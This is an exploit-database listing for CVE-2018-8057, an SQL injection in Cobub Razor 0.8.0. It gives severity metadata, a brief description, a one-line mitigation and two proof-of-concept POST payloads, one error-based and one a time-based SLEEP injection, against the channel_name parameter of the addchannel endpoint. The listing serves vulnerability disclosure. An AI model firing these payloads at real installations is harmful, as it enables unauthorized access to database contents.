header-logo
Suggest Exploit
vendor:
Cobub Razor
by:
Kyhvedn
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Cobub Razor
Affected Version From: 0.8.0
Affected Version To: 0.8.0
Patch Exists: YES
Related CWE: CVE-2018-8057
CPE: a:cobub:razor:0.8.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

Cobub Razor 0.8.0 SQL injection Vulnerability

The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection vulnerability,This could result in full information disclosure.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title:  Cobub Razor 0.8.0 SQL injection Vulnerability
# Date: 2018-04-16
# Exploit Author: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
# Vendor Homepage: http://www.cobub.com/
# Software Link: https://github.com/cobub/razor
# Version: 0.8.0
# CVE : CVE-2018-8057
 


The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection vulnerability,This could result in full information disclosure.


Code source:
/application/controllers/manage/channel.php at line 75-95


The SQL injection type: error-based and AND/OR time-based blind
Parameter: channel_name,platform


PoC:


http://localhost/index.php?/manage/channel/addchannel
POST data:
1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1